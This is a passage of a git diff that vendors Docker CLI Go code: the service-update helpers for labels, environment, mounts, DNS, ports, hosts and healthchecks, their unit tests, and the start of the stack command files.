+func updatePlacement(flags *pflag.FlagSet, placement *swarm.Placement) {
+	if flags.Changed(flagConstraintAdd) {
+		values := flags.Lookup(flagConstraintAdd).Value.(*opts.ListOpts).GetAll()
+		placement.Constraints = append(placement.Constraints, values...)
+	}
+	toRemove := buildToRemoveSet(flags, flagConstraintRemove)
+
+	newConstraints := []string{}
+	for _, constraint := range placement.Constraints {
+		if _, exists := toRemove[constraint]; !exists {
+			newConstraints = append(newConstraints, constraint)
+		}
+	}
+	// Sort so that result is predictable.
+	sort.Strings(newConstraints)
+
+	placement.Constraints = newConstraints
+}
+
+func updateContainerLabels(flags *pflag.FlagSet, field *map[string]string) {
+	if flags.Changed(flagContainerLabelAdd) {
+		if *field == nil {
+			*field = map[string]string{}
+		}
+
+		values := flags.Lookup(flagContainerLabelAdd).Value.(*opts.ListOpts).GetAll()
+		for key, value := range runconfigopts.ConvertKVStringsToMap(values) {
+			(*field)[key] = value
+		}
+	}
+
+	if *field != nil && flags.Changed(flagContainerLabelRemove) {
+		toRemove := flags.Lookup(flagContainerLabelRemove).Value.(*opts.ListOpts).GetAll()
+		for _, label := range toRemove {
+			delete(*field, label)
+		}
+	}
+}
+
+func updateLabels(flags *pflag.FlagSet, field *map[string]string) {
+	if flags.Changed(flagLabelAdd) {
+		if *field == nil {
+			*field = map[string]string{}
+		}
+
+		values := flags.Lookup(flagLabelAdd).Value.(*opts.ListOpts).GetAll()
+		for key, value := range runconfigopts.ConvertKVStringsToMap(values) {
+			(*field)[key] = value
+		}
+	}
+
+	if *field != nil && flags.Changed(flagLabelRemove) {
+		toRemove := flags.Lookup(flagLabelRemove).Value.(*opts.ListOpts).GetAll()
+		for _, label := range toRemove {
+			delete(*field, label)
+		}
+	}
+}
+
+func updateEnvironment(flags *pflag.FlagSet, field *[]string) {
+	envSet := map[string]string{}
+	for _, v := range *field {
+		envSet[envKey(v)] = v
+	}
+	if flags.Changed(flagEnvAdd) {
+		value := flags.Lookup(flagEnvAdd).Value.(*opts.ListOpts)
+		for _, v := range value.GetAll() {
+			envSet[envKey(v)] = v
+		}
+	}
+
+	*field = []string{}
+	for _, v := range envSet {
+		*field = append(*field, v)
+	}
+
+	toRemove := buildToRemoveSet(flags, flagEnvRemove)
+	*field = removeItems(*field, toRemove, envKey)
+}
+
+func getUpdatedSecrets(apiClient client.SecretAPIClient, flags *pflag.FlagSet, secrets []*swarm.SecretReference) ([]*swarm.SecretReference, error) {
+	if flags.Changed(flagSecretAdd) {
+		values := flags.Lookup(flagSecretAdd).Value.(*opts.SecretOpt).Value()
+
+		addSecrets, err := ParseSecrets(apiClient, values)
+		if err != nil {
+			return nil, err
+		}
+		secrets = append(secrets, addSecrets...)
+	}
+	toRemove := buildToRemoveSet(flags, flagSecretRemove)
+	newSecrets := []*swarm.SecretReference{}
+	for _, secret := range secrets {
+		if _, exists := toRemove[secret.SecretName]; !exists {
+			newSecrets = append(newSecrets, secret)
+		}
+	}
+
+	return newSecrets, nil
+}
+
+func envKey(value string) string {
+	kv := strings.SplitN(value, "=", 2)
+	return kv[0]
+}
+
+func itemKey(value string) string {
+	return value
+}
+
+func buildToRemoveSet(flags *pflag.FlagSet, flag string) map[string]struct{} {
+	var empty struct{}
+	toRemove := make(map[string]struct{})
+
+	if !flags.Changed(flag) {
+		return toRemove
+	}
+
+	toRemoveSlice := flags.Lookup(flag).Value.(*opts.ListOpts).GetAll()
+	for _, key := range toRemoveSlice {
+		toRemove[key] = empty
+	}
+	return toRemove
+}
+
+func removeItems(
+	seq []string,
+	toRemove map[string]struct{},
+	keyFunc func(string) string,
+) []string {
+	newSeq := []string{}
+	for _, item := range seq {
+		if _, exists := toRemove[keyFunc(item)]; !exists {
+			newSeq = append(newSeq, item)
+		}
+	}
+	return newSeq
+}
+
+type byMountSource []mounttypes.Mount
+
+func (m byMountSource) Len() int      { return len(m) }
+func (m byMountSource) Swap(i, j int) { m[i], m[j] = m[j], m[i] }
+func (m byMountSource) Less(i, j int) bool {
+	a, b := m[i], m[j]
+
+	if a.Source == b.Source {
+		return a.Target < b.Target
+	}
+
+	return a.Source < b.Source
+}
+
+func updateMounts(flags *pflag.FlagSet, mounts *[]mounttypes.Mount) error {
+
+	mountsByTarget := map[string]mounttypes.Mount{}
+
+	if flags.Changed(flagMountAdd) {
+		values := flags.Lookup(flagMountAdd).Value.(*opts.MountOpt).Value()
+		for _, mount := range values {
+			if _, ok := mountsByTarget[mount.Target]; ok {
+				return fmt.Errorf("duplicate mount target")
+			}
+			mountsByTarget[mount.Target] = mount
+		}
+	}
+
+	// Add old list of mount points minus updated one.
+	for _, mount := range *mounts {
+		if _, ok := mountsByTarget[mount.Target]; !ok {
+			mountsByTarget[mount.Target] = mount
+		}
+	}
+
+	newMounts := []mounttypes.Mount{}
+
+	toRemove := buildToRemoveSet(flags, flagMountRemove)
+
+	for _, mount := range mountsByTarget {
+		if _, exists := toRemove[mount.Target]; !exists {
+			newMounts = append(newMounts, mount)
+		}
+	}
+	sort.Sort(byMountSource(newMounts))
+	*mounts = newMounts
+	return nil
+}
+
+func updateGroups(flags *pflag.FlagSet, groups *[]string) error {
+	if flags.Changed(flagGroupAdd) {
+		values := flags.Lookup(flagGroupAdd).Value.(*opts.ListOpts).GetAll()
+		*groups = append(*groups, values...)
+	}
+	toRemove := buildToRemoveSet(flags, flagGroupRemove)
+
+	newGroups := []string{}
+	for _, group := range *groups {
+		if _, exists := toRemove[group]; !exists {
+			newGroups = append(newGroups, group)
+		}
+	}
+	// Sort so that result is predictable.
+	sort.Strings(newGroups)
+
+	*groups = newGroups
+	return nil
+}
+
+func removeDuplicates(entries []string) []string {
+	hit := map[string]bool{}
+	newEntries := []string{}
+	for _, v := range entries {
+		if !hit[v] {
+			newEntries = append(newEntries, v)
+			hit[v] = true
+		}
+	}
+	return newEntries
+}
+
+func updateDNSConfig(flags *pflag.FlagSet, config **swarm.DNSConfig) error {
+	newConfig := &swarm.DNSConfig{}
+
+	nameservers := (*config).Nameservers
+	if flags.Changed(flagDNSAdd) {
+		values := flags.Lookup(flagDNSAdd).Value.(*opts.ListOpts).GetAll()
+		nameservers = append(nameservers, values...)
+	}
+	nameservers = removeDuplicates(nameservers)
+	toRemove := buildToRemoveSet(flags, flagDNSRemove)
+	for _, nameserver := range nameservers {
+		if _, exists := toRemove[nameserver]; !exists {
+			newConfig.Nameservers = append(newConfig.Nameservers, nameserver)
+
+		}
+	}
+	// Sort so that result is predictable.
+	sort.Strings(newConfig.Nameservers)
+
+	search := (*config).Search
+	if flags.Changed(flagDNSSearchAdd) {
+		values := flags.Lookup(flagDNSSearchAdd).Value.(*opts.ListOpts).GetAll()
+		search = append(search, values...)
+	}
+	search = removeDuplicates(search)
+	toRemove = buildToRemoveSet(flags, flagDNSSearchRemove)
+	for _, entry := range search {
+		if _, exists := toRemove[entry]; !exists {
+			newConfig.Search = append(newConfig.Search, entry)
+		}
+	}
+	// Sort so that result is predictable.
+	sort.Strings(newConfig.Search)
+
+	options := (*config).Options
+	if flags.Changed(flagDNSOptionAdd) {
+		values := flags.Lookup(flagDNSOptionAdd).Value.(*opts.ListOpts).GetAll()
+		options = append(options, values...)
+	}
+	options = removeDuplicates(options)
+	toRemove = buildToRemoveSet(flags, flagDNSOptionRemove)
+	for _, option := range options {
+		if _, exists := toRemove[option]; !exists {
+			newConfig.Options = append(newConfig.Options, option)
+		}
+	}
+	// Sort so that result is predictable.
+	sort.Strings(newConfig.Options)
+
+	*config = newConfig
+	return nil
+}
+
+type byPortConfig []swarm.PortConfig
+
+func (r byPortConfig) Len() int      { return len(r) }
+func (r byPortConfig) Swap(i, j int) { r[i], r[j] = r[j], r[i] }
+func (r byPortConfig) Less(i, j int) bool {
+	// We convert PortConfig into `port/protocol`, e.g., `80/tcp`
+	// In updatePorts we already filter out with map so there is duplicate entries
+	return portConfigToString(&r[i]) < portConfigToString(&r[j])
+}
+
+func portConfigToString(portConfig *swarm.PortConfig) string {
+	protocol := portConfig.Protocol
+	mode := portConfig.PublishMode
+	return fmt.Sprintf("%v:%v/%s/%s", portConfig.PublishedPort, portConfig.TargetPort, protocol, mode)
+}
+
+// FIXME(vdemeester) port to opts.PortOpt
+// This validation is only used for `--publish-rm`.
+// The `--publish-rm` takes:
+// <TargetPort>[/<Protocol>] (e.g., 80, 80/tcp, 53/udp)
+func validatePublishRemove(val string) (string, error) {
+	proto, port := nat.SplitProtoPort(val)
+	if proto != "tcp" && proto != "udp" {
+		return "", fmt.Errorf("invalid protocol '%s' for %s", proto, val)
+	}
+	if strings.Contains(port, ":") {
+		return "", fmt.Errorf("invalid port format: '%s', should be <TargetPort>[/<Protocol>] (e.g., 80, 80/tcp, 53/udp)", port)
+	}
+	if _, err := nat.ParsePort(port); err != nil {
+		return "", err
+	}
+	return val, nil
+}
+
+func updatePorts(flags *pflag.FlagSet, portConfig *[]swarm.PortConfig) error {
+	// The key of the map is `port/protocol`, e.g., `80/tcp`
+	portSet := map[string]swarm.PortConfig{}
+
+	// Build the current list of portConfig
+	for _, entry := range *portConfig {
+		if _, ok := portSet[portConfigToString(&entry)]; !ok {
+			portSet[portConfigToString(&entry)] = entry
+		}
+	}
+
+	newPorts := []swarm.PortConfig{}
+
+	// Clean current ports
+	toRemove := flags.Lookup(flagPublishRemove).Value.(*opts.PortOpt).Value()
+portLoop:
+	for _, port := range portSet {
+		for _, pConfig := range toRemove {
+			if equalProtocol(port.Protocol, pConfig.Protocol) &&
+				port.TargetPort == pConfig.TargetPort &&
+				equalPublishMode(port.PublishMode, pConfig.PublishMode) {
+				continue portLoop
+			}
+		}
+
+		newPorts = append(newPorts, port)
+	}
+
+	// Check to see if there are any conflict in flags.
+	if flags.Changed(flagPublishAdd) {
+		ports := flags.Lookup(flagPublishAdd).Value.(*opts.PortOpt).Value()
+
+		for _, port := range ports {
+			if v, ok := portSet[portConfigToString(&port)]; ok {
+				if v != port {
+					fmt.Println("v", v)
+					return fmt.Errorf("conflicting port mapping between %v:%v/%s and %v:%v/%s", port.PublishedPort, port.TargetPort, port.Protocol, v.PublishedPort, v.TargetPort, v.Protocol)
+				}
+				continue
+			}
+			//portSet[portConfigToString(&port)] = port
+			newPorts = append(newPorts, port)
+		}
+	}
+
+	// Sort the PortConfig to avoid unnecessary updates
+	sort.Sort(byPortConfig(newPorts))
+	*portConfig = newPorts
+	return nil
+}
+
+func equalProtocol(prot1, prot2 swarm.PortConfigProtocol) bool {
+	return prot1 == prot2 ||
+		(prot1 == swarm.PortConfigProtocol("") && prot2 == swarm.PortConfigProtocolTCP) ||
+		(prot2 == swarm.PortConfigProtocol("") && prot1 == swarm.PortConfigProtocolTCP)
+}
+
+func equalPublishMode(mode1, mode2 swarm.PortConfigPublishMode) bool {
+	return mode1 == mode2 ||
+		(mode1 == swarm.PortConfigPublishMode("") && mode2 == swarm.PortConfigPublishModeIngress) ||
+		(mode2 == swarm.PortConfigPublishMode("") && mode1 == swarm.PortConfigPublishModeIngress)
+}
+
+func equalPort(targetPort nat.Port, port swarm.PortConfig) bool {
+	return (string(port.Protocol) == targetPort.Proto() &&
+		port.TargetPort == uint32(targetPort.Int()))
+}
+
+func updateReplicas(flags *pflag.FlagSet, serviceMode *swarm.ServiceMode) error {
+	if !flags.Changed(flagReplicas) {
+		return nil
+	}
+
+	if serviceMode == nil || serviceMode.Replicated == nil {
+		return fmt.Errorf("replicas can only be used with replicated mode")
+	}
+	serviceMode.Replicated.Replicas = flags.Lookup(flagReplicas).Value.(*Uint64Opt).Value()
+	return nil
+}
+
+func updateHosts(flags *pflag.FlagSet, hosts *[]string) error {
+	// Combine existing Hosts (in swarmkit format) with the host to add (convert to swarmkit format)
+	if flags.Changed(flagHostAdd) {
+		values := convertExtraHostsToSwarmHosts(flags.Lookup(flagHostAdd).Value.(*opts.ListOpts).GetAll())
+		*hosts = append(*hosts, values...)
+	}
+	// Remove duplicate
+	*hosts = removeDuplicates(*hosts)
+
+	keysToRemove := make(map[string]struct{})
+	if flags.Changed(flagHostRemove) {
+		var empty struct{}
+		extraHostsToRemove := flags.Lookup(flagHostRemove).Value.(*opts.ListOpts).GetAll()
+		for _, entry := range extraHostsToRemove {
+			key := strings.SplitN(entry, ":", 2)[0]
+			keysToRemove[key] = empty
+		}
+	}
+
+	newHosts := []string{}
+	for _, entry := range *hosts {
+		// Since this is in swarmkit format, we need to find the key, which is canonical_hostname of:
+		// IP_address canonical_hostname [aliases...]
+		parts := strings.Fields(entry)
+		if len(parts) > 1 {
+			key := parts[1]
+			if _, exists := keysToRemove[key]; !exists {
+				newHosts = append(newHosts, entry)
+			}
+		} else {
+			newHosts = append(newHosts, entry)
+		}
+	}
+
+	// Sort so that result is predictable.
+	sort.Strings(newHosts)
+
+	*hosts = newHosts
+	return nil
+}
+
+// updateLogDriver updates the log driver only if the log driver flag is set.
+// All options will be replaced with those provided on the command line.
+func updateLogDriver(flags *pflag.FlagSet, taskTemplate *swarm.TaskSpec) error {
+	if !flags.Changed(flagLogDriver) {
+		return nil
+	}
+
+	name, err := flags.GetString(flagLogDriver)
+	if err != nil {
+		return err
+	}
+
+	if name == "" {
+		return nil
+	}
+
+	taskTemplate.LogDriver = &swarm.Driver{
+		Name:    name,
+		Options: runconfigopts.ConvertKVStringsToMap(flags.Lookup(flagLogOpt).Value.(*opts.ListOpts).GetAll()),
+	}
+
+	return nil
+}
+
+func updateHealthcheck(flags *pflag.FlagSet, containerSpec *swarm.ContainerSpec) error {
+	if !anyChanged(flags, flagNoHealthcheck, flagHealthCmd, flagHealthInterval, flagHealthRetries, flagHealthTimeout) {
+		return nil
+	}
+	if containerSpec.Healthcheck == nil {
+		containerSpec.Healthcheck = &container.HealthConfig{}
+	}
+	noHealthcheck, err := flags.GetBool(flagNoHealthcheck)
+	if err != nil {
+		return err
+	}
+	if noHealthcheck {
+		if !anyChanged(flags, flagHealthCmd, flagHealthInterval, flagHealthRetries, flagHealthTimeout) {
+			containerSpec.Healthcheck = &container.HealthConfig{
+				Test: []string{"NONE"},
+			}
+			return nil
+		}
+		return fmt.Errorf("--%s conflicts with --health-* options", flagNoHealthcheck)
+	}
+	if len(containerSpec.Healthcheck.Test) > 0 && containerSpec.Healthcheck.Test[0] == "NONE" {
+		containerSpec.Healthcheck.Test = nil
+	}
+	if flags.Changed(flagHealthInterval) {
+		val := *flags.Lookup(flagHealthInterval).Value.(*PositiveDurationOpt).Value()
+		containerSpec.Healthcheck.Interval = val
+	}
+	if flags.Changed(flagHealthTimeout) {
+		val := *flags.Lookup(flagHealthTimeout).Value.(*PositiveDurationOpt).Value()
+		containerSpec.Healthcheck.Timeout = val
+	}
+	if flags.Changed(flagHealthRetries) {
+		containerSpec.Healthcheck.Retries, _ = flags.GetInt(flagHealthRetries)
+	}
+	if flags.Changed(flagHealthCmd) {
+		cmd, _ := flags.GetString(flagHealthCmd)
+		if cmd != "" {
+			containerSpec.Healthcheck.Test = []string{"CMD-SHELL", cmd}
+		} else {
+			containerSpec.Healthcheck.Test = nil
+		}
+	}
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/cli/command/service/update_test.go b/vendor/github.com/docker/docker/cli/command/service/update_test.go
new file mode 100644
index 0000000000..08fe248769
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/service/update_test.go
@@ -0,0 +1,384 @@
+package service
+
+import (
+	"reflect"
+	"sort"
+	"testing"
+	"time"
+
+	"github.com/docker/docker/api/types/container"
+	mounttypes "github.com/docker/docker/api/types/mount"
+	"github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/pkg/testutil/assert"
+)
+
+func TestUpdateServiceArgs(t *testing.T) {
+	flags := newUpdateCommand(nil).Flags()
+	flags.Set("args", "the \"new args\"")
+
+	spec := &swarm.ServiceSpec{}
+	cspec := &spec.TaskTemplate.ContainerSpec
+	cspec.Args = []string{"old", "args"}
+
+	updateService(flags, spec)
+	assert.EqualStringSlice(t, cspec.Args, []string{"the", "new args"})
+}
+
+func TestUpdateLabels(t *testing.T) {
+	flags := newUpdateCommand(nil).Flags()
+	flags.Set("label-add", "toadd=newlabel")
+	flags.Set("label-rm", "toremove")
+
+	labels := map[string]string{
+		"toremove": "thelabeltoremove",
+		"tokeep":   "value",
+	}
+
+	updateLabels(flags, &labels)
+	assert.Equal(t, len(labels), 2)
+	assert.Equal(t, labels["tokeep"], "value")
+	assert.Equal(t, labels["toadd"], "newlabel")
+}
+
+func TestUpdateLabelsRemoveALabelThatDoesNotExist(t *testing.T) {
+	flags := newUpdateCommand(nil).Flags()
+	flags.Set("label-rm", "dne")
+
+	labels := map[string]string{"foo": "theoldlabel"}
+	updateLabels(flags, &labels)
+	assert.Equal(t, len(labels), 1)
+}
+
+func TestUpdatePlacement(t *testing.T) {
+	flags := newUpdateCommand(nil).Flags()
+	flags.Set("constraint-add", "node=toadd")
+	flags.Set("constraint-rm", "node!=toremove")
+
+	placement := &swarm.Placement{
+		Constraints: []string{"node!=toremove", "container=tokeep"},
+	}
+
+	updatePlacement(flags, placement)
+	assert.Equal(t, len(placement.Constraints), 2)
+	assert.Equal(t, placement.Constraints[0], "container=tokeep")
+	assert.Equal(t, placement.Constraints[1], "node=toadd")
+}
+
+func TestUpdateEnvironment(t *testing.T) {
+	flags := newUpdateCommand(nil).Flags()
+	flags.Set("env-add", "toadd=newenv")
+	flags.Set("env-rm", "toremove")
+
+	envs := []string{"toremove=theenvtoremove", "tokeep=value"}
+
+	updateEnvironment(flags, &envs)
+	assert.Equal(t, len(envs), 2)
+	// Order has been removed in updateEnvironment (map)
+	sort.Strings(envs)
+	assert.Equal(t, envs[0], "toadd=newenv")
+	assert.Equal(t, envs[1], "tokeep=value")
+}
+
+func TestUpdateEnvironmentWithDuplicateValues(t *testing.T) {
+	flags := newUpdateCommand(nil).Flags()
+	flags.Set("env-add", "foo=newenv")
+	flags.Set("env-add", "foo=dupe")
+	flags.Set("env-rm", "foo")
+
+	envs := []string{"foo=value"}
+
+	updateEnvironment(flags, &envs)
+	assert.Equal(t, len(envs), 0)
+}
+
+func TestUpdateEnvironmentWithDuplicateKeys(t *testing.T) {
+	// Test case for #25404
+	flags := newUpdateCommand(nil).Flags()
+	flags.Set("env-add", "A=b")
+
+	envs := []string{"A=c"}
+
+	updateEnvironment(flags, &envs)
+	assert.Equal(t, len(envs), 1)
+	assert.Equal(t, envs[0], "A=b")
+}
+
+func TestUpdateGroups(t *testing.T) {
+	flags := newUpdateCommand(nil).Flags()
+	flags.Set("group-add", "wheel")
+	flags.Set("group-add", "docker")
+	flags.Set("group-rm", "root")
+	flags.Set("group-add", "foo")
+	flags.Set("group-rm", "docker")
+
+	groups := []string{"bar", "root"}
+
+	updateGroups(flags, &groups)
+	assert.Equal(t, len(groups), 3)
+	assert.Equal(t, groups[0], "bar")
+	assert.Equal(t, groups[1], "foo")
+	assert.Equal(t, groups[2], "wheel")
+}
+
+func TestUpdateDNSConfig(t *testing.T) {
+	flags := newUpdateCommand(nil).Flags()
+
+	// IPv4, with duplicates
+	flags.Set("dns-add", "1.1.1.1")
+	flags.Set("dns-add", "1.1.1.1")
+	flags.Set("dns-add", "2.2.2.2")
+	flags.Set("dns-rm", "3.3.3.3")
+	flags.Set("dns-rm", "2.2.2.2")
+	// IPv6
+	flags.Set("dns-add", "2001:db8:abc8::1")
+	// Invalid dns record
+	assert.Error(t, flags.Set("dns-add", "x.y.z.w"), "x.y.z.w is not an ip address")
+
+	// domains with duplicates
+	flags.Set("dns-search-add", "example.com")
+	flags.Set("dns-search-add", "example.com")
+	flags.Set("dns-search-add", "example.org")
+	flags.Set("dns-search-rm", "example.org")
+	// Invalid dns search domain
+	assert.Error(t, flags.Set("dns-search-add", "example$com"), "example$com is not a valid domain")
+
+	flags.Set("dns-option-add", "ndots:9")
+	flags.Set("dns-option-rm", "timeout:3")
+
+	config := &swarm.DNSConfig{
+		Nameservers: []string{"3.3.3.3", "5.5.5.5"},
+		Search:      []string{"localdomain"},
+		Options:     []string{"timeout:3"},
+	}
+
+	updateDNSConfig(flags, &config)
+
+	assert.Equal(t, len(config.Nameservers), 3)
+	assert.Equal(t, config.Nameservers[0], "1.1.1.1")
+	assert.Equal(t, config.Nameservers[1], "2001:db8:abc8::1")
+	assert.Equal(t, config.Nameservers[2], "5.5.5.5")
+
+	assert.Equal(t, len(config.Search), 2)
+	assert.Equal(t, config.Search[0], "example.com")
+	assert.Equal(t, config.Search[1], "localdomain")
+
+	assert.Equal(t, len(config.Options), 1)
+	assert.Equal(t, config.Options[0], "ndots:9")
+}
+
+func TestUpdateMounts(t *testing.T) {
+	flags := newUpdateCommand(nil).Flags()
+	flags.Set("mount-add", "type=volume,source=vol2,target=/toadd")
+	flags.Set("mount-rm", "/toremove")
+
+	mounts := []mounttypes.Mount{
+		{Target: "/toremove", Source: "vol1", Type: mounttypes.TypeBind},
+		{Target: "/tokeep", Source: "vol3", Type: mounttypes.TypeBind},
+	}
+
+	updateMounts(flags, &mounts)
+	assert.Equal(t, len(mounts), 2)
+	assert.Equal(t, mounts[0].Target, "/toadd")
+	assert.Equal(t, mounts[1].Target, "/tokeep")
+
+}
+
+func TestUpdateMountsWithDuplicateMounts(t *testing.T) {
+	flags := newUpdateCommand(nil).Flags()
+	flags.Set("mount-add", "type=volume,source=vol4,target=/toadd")
+
+	mounts := []mounttypes.Mount{
+		{Target: "/tokeep1", Source: "vol1", Type: mounttypes.TypeBind},
+		{Target: "/toadd", Source: "vol2", Type: mounttypes.TypeBind},
+		{Target: "/tokeep2", Source: "vol3", Type: mounttypes.TypeBind},
+	}
+
+	updateMounts(flags, &mounts)
+	assert.Equal(t, len(mounts), 3)
+	assert.Equal(t, mounts[0].Target, "/tokeep1")
+	assert.Equal(t, mounts[1].Target, "/tokeep2")
+	assert.Equal(t, mounts[2].Target, "/toadd")
+}
+
+func TestUpdatePorts(t *testing.T) {
+	flags := newUpdateCommand(nil).Flags()
+	flags.Set("publish-add", "1000:1000")
+	flags.Set("publish-rm", "333/udp")
+
+	portConfigs := []swarm.PortConfig{
+		{TargetPort: 333, Protocol: swarm.PortConfigProtocolUDP},
+		{TargetPort: 555},
+	}
+
+	err := updatePorts(flags, &portConfigs)
+	assert.Equal(t, err, nil)
+	assert.Equal(t, len(portConfigs), 2)
+	// Do a sort to have the order (might have changed by map)
+	targetPorts := []int{int(portConfigs[0].TargetPort), int(portConfigs[1].TargetPort)}
+	sort.Ints(targetPorts)
+	assert.Equal(t, targetPorts[0], 555)
+	assert.Equal(t, targetPorts[1], 1000)
+}
+
+func TestUpdatePortsDuplicate(t *testing.T) {
+	// Test case for #25375
+	flags := newUpdateCommand(nil).Flags()
+	flags.Set("publish-add", "80:80")
+
+	portConfigs := []swarm.PortConfig{
+		{
+			TargetPort:    80,
+			PublishedPort: 80,
+			Protocol:      swarm.PortConfigProtocolTCP,
+			PublishMode:   swarm.PortConfigPublishModeIngress,
+		},
+	}
+
+	err := updatePorts(flags, &portConfigs)
+	assert.Equal(t, err, nil)
+	assert.Equal(t, len(portConfigs), 1)
+	assert.Equal(t, portConfigs[0].TargetPort, uint32(80))
+}
+
+func TestUpdateHealthcheckTable(t *testing.T) {
+	type test struct {
+		flags    [][2]string
+		initial  *container.HealthConfig
+		expected *container.HealthConfig
+		err      string
+	}
+	testCases := []test{
+		{
+			flags:    [][2]string{{"no-healthcheck", "true"}},
+			initial:  &container.HealthConfig{Test: []string{"CMD-SHELL", "cmd1"}, Retries: 10},
+			expected: &container.HealthConfig{Test: []string{"NONE"}},
+		},
+		{
+			flags:    [][2]string{{"health-cmd", "cmd1"}},
+			initial:  &container.HealthConfig{Test: []string{"NONE"}},
+			expected: &container.HealthConfig{Test: []string{"CMD-SHELL", "cmd1"}},
+		},
+		{
+			flags:    [][2]string{{"health-retries", "10"}},
+			initial:  &container.HealthConfig{Test: []string{"NONE"}},
+			expected: &container.HealthConfig{Retries: 10},
+		},
+		{
+			flags:    [][2]string{{"health-retries", "10"}},
+			initial:  &container.HealthConfig{Test: []string{"CMD", "cmd1"}},
+			expected: &container.HealthConfig{Test: []string{"CMD", "cmd1"}, Retries: 10},
+		},
+		{
+			flags:    [][2]string{{"health-interval", "1m"}},
+			initial:  &container.HealthConfig{Test: []string{"CMD", "cmd1"}},
+			expected: &container.HealthConfig{Test: []string{"CMD", "cmd1"}, Interval: time.Minute},
+		},
+		{
+			flags:    [][2]string{{"health-cmd", ""}},
+			initial:  &container.HealthConfig{Test: []string{"CMD", "cmd1"}, Retries: 10},
+			expected: &container.HealthConfig{Retries: 10},
+		},
+		{
+			flags:    [][2]string{{"health-retries", "0"}},
+			initial:  &container.HealthConfig{Test: []string{"CMD", "cmd1"}, Retries: 10},
+			expected: &container.HealthConfig{Test: []string{"CMD", "cmd1"}},
+		},
+		{
+			flags: [][2]string{{"health-cmd", "cmd1"}, {"no-healthcheck", "true"}},
+			err:   "--no-healthcheck conflicts with --health-* options",
+		},
+		{
+			flags: [][2]string{{"health-interval", "10m"}, {"no-healthcheck", "true"}},
+			err:   "--no-healthcheck conflicts with --health-* options",
+		},
+		{
+			flags: [][2]string{{"health-timeout", "1m"}, {"no-healthcheck", "true"}},
+			err:   "--no-healthcheck conflicts with --health-* options",
+		},
+	}
+	for i, c := range testCases {
+		flags := newUpdateCommand(nil).Flags()
+		for _, flag := range c.flags {
+			flags.Set(flag[0], flag[1])
+		}
+		cspec := &swarm.ContainerSpec{
+			Healthcheck: c.initial,
+		}
+		err := updateHealthcheck(flags, cspec)
+		if c.err != "" {
+			assert.Error(t, err, c.err)
+		} else {
+			assert.NilError(t, err)
+			if !reflect.DeepEqual(cspec.Healthcheck, c.expected) {
+				t.Errorf("incorrect result for test %d, expected health config:\n\t%#v\ngot:\n\t%#v", i, c.expected, cspec.Healthcheck)
+			}
+		}
+	}
+}
+
+func TestUpdateHosts(t *testing.T) {
+	flags := newUpdateCommand(nil).Flags()
+	flags.Set("host-add", "example.net:2.2.2.2")
+	flags.Set("host-add", "ipv6.net:2001:db8:abc8::1")
+	// remove with ipv6 should work
+	flags.Set("host-rm", "example.net:2001:db8:abc8::1")
+	// just hostname should work as well
+	flags.Set("host-rm", "example.net")
+	// bad format error
+	assert.Error(t, flags.Set("host-add", "$example.com$"), "bad format for add-host:")
+
+	hosts := []string{"1.2.3.4 example.com", "4.3.2.1 example.org", "2001:db8:abc8::1 example.net"}
+
+	updateHosts(flags, &hosts)
+	assert.Equal(t, len(hosts), 3)
+	assert.Equal(t, hosts[0], "1.2.3.4 example.com")
+	assert.Equal(t, hosts[1], "2001:db8:abc8::1 ipv6.net")
+	assert.Equal(t, hosts[2], "4.3.2.1 example.org")
+}
+
+func TestUpdatePortsRmWithProtocol(t *testing.T) {
+	flags := newUpdateCommand(nil).Flags()
+	flags.Set("publish-add", "8081:81")
+	flags.Set("publish-add", "8082:82")
+	flags.Set("publish-rm", "80")
+	flags.Set("publish-rm", "81/tcp")
+	flags.Set("publish-rm", "82/udp")
+
+	portConfigs := []swarm.PortConfig{
+		{
+			TargetPort:    80,
+			PublishedPort: 8080,
+			Protocol:      swarm.PortConfigProtocolTCP,
+			PublishMode:   swarm.PortConfigPublishModeIngress,
+		},
+	}
+
+	err := updatePorts(flags, &portConfigs)
+	assert.Equal(t, err, nil)
+	assert.Equal(t, len(portConfigs), 2)
+	assert.Equal(t, portConfigs[0].TargetPort, uint32(81))
+	assert.Equal(t, portConfigs[1].TargetPort, uint32(82))
+}
+
+// FIXME(vdemeester) port to opts.PortOpt
+func TestValidatePort(t *testing.T) {
+	validPorts := []string{"80/tcp", "80", "80/udp"}
+	invalidPorts := map[string]string{
+		"9999999":   "out of range",
+		"80:80/tcp": "invalid port format",
+		"53:53/udp": "invalid port format",
+		"80:80":     "invalid port format",
+		"80/xyz":    "invalid protocol",
+		"tcp":       "invalid syntax",
+		"udp":       "invalid syntax",
+		"":          "invalid protocol",
+	}
+	for _, port := range validPorts {
+		_, err := validatePublishRemove(port)
+		assert.Equal(t, err, nil)
+	}
+	for port, e := range invalidPorts {
+		_, err := validatePublishRemove(port)
+		assert.Error(t, err, e)
+	}
+}
diff --git a/vendor/github.com/docker/docker/cli/command/stack/cmd.go b/vendor/github.com/docker/docker/cli/command/stack/cmd.go
new file mode 100644
index 0000000000..860bfedd1a
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/stack/cmd.go
@@ -0,0 +1,35 @@
+package stack
+
+import (
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/spf13/cobra"
+)
+
+// NewStackCommand returns a cobra command for `stack` subcommands
+func NewStackCommand(dockerCli *command.DockerCli) *cobra.Command {
+	cmd := &cobra.Command{
+		Use:   "stack",
+		Short: "Manage Docker stacks",
+		Args:  cli.NoArgs,
+		RunE:  dockerCli.ShowHelp,
+		Tags:  map[string]string{"version": "1.25"},
+	}
+	cmd.AddCommand(
+		newDeployCommand(dockerCli),
+		newListCommand(dockerCli),
+		newRemoveCommand(dockerCli),
+		newServicesCommand(dockerCli),
+		newPsCommand(dockerCli),
+	)
+	return cmd
+}
+
+// NewTopLevelDeployCommand returns a command for `docker deploy`
+func NewTopLevelDeployCommand(dockerCli *command.DockerCli) *cobra.Command {
+	cmd := newDeployCommand(dockerCli)
+	// Remove the aliases at the top level
+	cmd.Aliases = []string{}
+	cmd.Tags = map[string]string{"experimental": "", "version": "1.25"}
+	return cmd
+}
diff --git a/vendor/github.com/docker/docker/cli/command/stack/common.go b/vendor/github.com/docker/docker/cli/command/stack/common.go
new file mode 100644
index 0000000000..72719f94fc
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/stack/common.go
@@ -0,0 +1,60 @@
+package stack
+
+import (
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/api/types"
